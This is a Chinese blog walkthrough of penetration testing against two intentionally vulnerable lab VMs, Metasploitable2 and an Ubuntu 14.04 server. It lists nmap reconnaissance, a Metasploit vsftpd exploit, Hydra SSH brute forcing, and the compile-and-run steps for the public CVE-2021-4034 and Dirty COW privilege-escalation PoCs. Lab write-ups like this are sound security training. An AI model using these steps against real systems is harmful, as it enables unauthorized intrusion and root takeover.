metasploitable2与Ubuntu Server 14.04.1 LTS渗透

最新推荐文章于 2024-07-23 23:40:30 发布
最新推荐文章于 2024-07-23 23:40:30 发布
阅读量170 收藏
点赞数
文章标签: ubuntu 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74378387/article/details/134174344
版权

环境搭建

kali:
metasploitable2:10.10.10.139 下载链接:https://pan.baidu.com/s/14iPfB0EnG-orRIPvvN4vxg?pwd=babt
Ubuntu Server:10.10.10.135 下载链接:https://pan.baidu.com/s/13w8O8A8c79ubCN2BC3RrBQ?pwd=gatw
让kali与两个靶机用同一张网卡
在这里插入图片描述

一、metasploitable2渗透

arp-scan -l 
# 用于扫描一个网络中的ARP(地址解析协议)表。ARP表是一个映射表,用于将IP地址转换为MAC地址。
# 通过使用arp-scan -l命令,可以列出网络中所有设备的ARP表项

得到metasploitable2靶机IP:10.10.10.139
在这里插入图片描述

nmap -sV -O 10.10.10.139 
# -sV:这个参数用于启用版本检测扫描。Nmap将尝试确定目标主机上开放端口的服务版本信息。
# -O:这个参数用于启用操作系统检测。Nmap将尝试确定目标主机的操作系统类型。

发现21端口开放
在这里插入图片描述

msfconsol #开启msf
search #找到关于vsftpd漏洞模块

也可以用445端口的samba漏洞
在这里插入图片描述

use 1 #使用模块1
set rhosts 10.10.10.139 #设置靶机IP
run # 开始攻击

直接获得root
在这里插入图片描述

二、Ubuntu Server渗透

需要用到的poc:链接:https://pan.baidu.com/s/1iiOGAWlsk2DP7Bgp0Nfhdg?pwd=pock
先获取靶机ip
在这里插入图片描述
发现靶机开放22端口,可以使用爆破获取登录用户和密码
在这里插入图片描述

hydra -L e.txt -P passwd.txt 10.10.10.135 ssh -f
# -L 指定用户名字典
# -P 指定密码字典
# -f 表示在破解过程中使用fork模式。这意味着Hydra会同时尝试多个用户名和密码组合

在这里插入图片描述

ssh -p 22 codingteam@10.10.10.135 #远程登录到靶机

在这里插入图片描述

uname -r #显示操作系统的发行版号。

在这里插入图片描述
这里我换成MobaXterm_Personal_12.4远程到靶机
上传Linux-Exploit-Suggester.sh(liunx辅助提权脚本)到靶机

mv Linux-Exploit-Suggester.sh lse.sh #把脚本重命名为lse.sh

我们将用到CVE-2016-5195和CVE-2021-4034
在这里插入图片描述

CVE-2021-4034-main利用

将下载好的文件上传到靶机

cd cve-2021-4034-main #进入文件目录
gcc cve-2021-4034-poc -o exp 
#用GCC编译器编译一个叫做cve-2021-4034-poc的POC(Proof of Concept,概念证明)
# -o exp 命名为exp

./exp #运行poc代码

发现已经获取root权限
在这里插入图片描述

CVE-2016-5195-master

进入codingteam用户具有可执行的目录:home或者tmp
可以使用ls -al 查看对目录所有的权限
将CVE-2016-5195-master上传到拥有可执行的目录下
在这里插入图片描述

pwd #查看当前路径
mv CVE-2016-5195-master CVE #将文件重名为CVE
cd CVE #进入文件目录
make #编译
./dcow #运行提权脚本

它会给出一个密码,复制后输入su提权
可以发现我们已经是root了
在这里插入图片描述
-=============================================-
有不足之处,请各位指出

以乐助勤
关注
Metasploitable2-Linux.7z
02-26
Metasploitable2-Linux.7z
metasploitable2的下载
ljj123_的博客
10-25 7525
metasploitable是一个故意易受攻击的Linux虚拟机。该虚拟机可用于进行安全培训、测试安全工具和实践常见的渗透测试技术。 默认登录名和密码为msfadmin:msfadmin。 下载地址如下: https://sourceforge.net/projects/metasploitable/ 该虚拟系统兼容VMware、VirtualBox和其他虚拟平台,默认值开启一个网络适配器...
靶机Metasploitable2的安装
最新发布
m0_65992344的博客
07-23 545
靶机Metasploitable2的安装
kali linux渗透入门(1)
leaon的博客
08-30 616
渗透感兴趣,这些天研究了一下kali,搞了个课程,在VM上搭建了个靶机: https://sourceforge.mirrorservice.org/m/me/metasploitable/Metasploitable2/ 对于kali的安装不做过多陈述,网上很多教程,以下把我学习到的笔记记录,更新中。 1 sqlmap sql注入 ,没啥好说,id=1测试,注入,基本行不通 2.ar...
安装Metasploitable2
imtech的博客
01-31 2622
安装Metasploitable2
metasploitable-linux-2.0.0.zip
09-01
metasploitable-linux,metasploitable-linuxmetasploitable-linux metasploitable-linux
Ubuntu Server 20.04 LTS x64 VMWare:Ubuntu Server 64位20.04 LTS VMWare映像-开源
05-30
Ubuntu Server 64bit 20.04.04 VMWare Image 用户名和密码请访问 https://vm.puvvadi.me
ubuntu-14.04.1-desktop-amd64.iso.zip
09-04
总的来说,"ubuntu-14.04.1-desktop-amd64.iso.zip"文件代表了一个经过优化和更新的Ubuntu LTS版本,适用于64位AMD处理器的桌面系统。通过解压缩和适当的媒介制作,用户可以轻松地体验或安装这个强大而稳定的开源...
vagrant-box:Docker-friendly Ubuntu 14.04.1 LTS 64-bit box 支持 VirtualBox provider
06-13
带有 Docker 的 Ubuntu 14.04.1 LTS 支持 VirtualBox 提供程序 该存储库包含Vagrantfile和相关文件,用于为设置一个干净的 Ubuntu 14.04.1 LTS 64 位安装框。 它目前支持提供程序。 上提供了带有 Docker 版本 1.3.0...
Ubuntu Server 16.10 x86 for developers:适用于开发人员的Ubuntu Server 16.10 LTS虚拟机映像-开源
04-19
Ubuntu Server 16.10 LTS 32位。 虚拟机的映像(文件格式-VHD)。 映像应在VirtualBox或VMware中运行。 该图像是专门为Web开发人员制作的。 任何Web项目,不同框架或CMS的快速启动。 它的安装包括:-xorg和Window ...
Metasploitable2-Linux.zip_believable
01-08
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。此文件是虚拟机镜像文件,可以直接在虚拟系统兼容的VMware,VirtualBox,和其他虚拟平台打开使用。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。
metasploit
10-04
metasploit的使用教程,详细介绍了metasploit的方法
Metasploitable_ubuntu-book.zip
07-14
Linux MetasploitableMetasploit渗透测试魔鬼训练营》的靶机靶机中存在samba服务漏洞,可供小伙伴进行下载,进行靶机漏洞的简单复现
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Metasploitable2_linux免安装-网盘资源
monster663的博客
02-05 6470
Metasploitable简介 Metasploitable是一个靶机系统,里面含有包括多种典型的安全漏洞(包括XSS,CSRF等等),十分适合用于测试安全工具和练习渗透测试技术,下面详细给大家介绍一下在VMware15上安装Metasploitable2的过程。 下载链接 链接:https://pan.baidu.com/s/16y613fN47xlLTMc94FPWTQ 提取码:qwer 安装教程 首先下载好文件后解压到一个指定目录,看到如下文件 我们双击一下.vmx文件,VMwar.
在VMware上安装Metasploitable2
weixin_44257023的博客
08-01 3378
在VMware上安装Metasploitable2靶场,以及下载Metasploitable2靶场、Metasploitable2修改root密码以切换root账号
metasploitable2安装wordpress
wwdlk的专栏
10-31 3512
目的:纯粹为了体验一把wordpress
在VM上安装Metasploitable2
qq_61793472的博客
10-06 811
1.下载Metasploitable2靶场 Metasploitable2官网:https://information.rapid7.com/metasploitable-download.html 2.在VM上安装Metasploitable2 解压下载好的安装包,点击这个文件,现在VM打开 3.启动Metasploitable2靶场 默认账号和密码:msfadmin (密码输入不会显示) 3.修改root账号密码 用默认账号密码登陆后执行命令: sudo
Ubuntu Server 14.04 LTS新特性详解
Ubuntu Server 14.04 LTS,代号“Trusty Tahr”,是2014年4月发布的一个长期支持版本,它提供了对OpenStack Icehouse的集成,以及众多针对云计算和超大规模计算的新功能和工具。LTS意味着这个版本将由Canonical提供...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值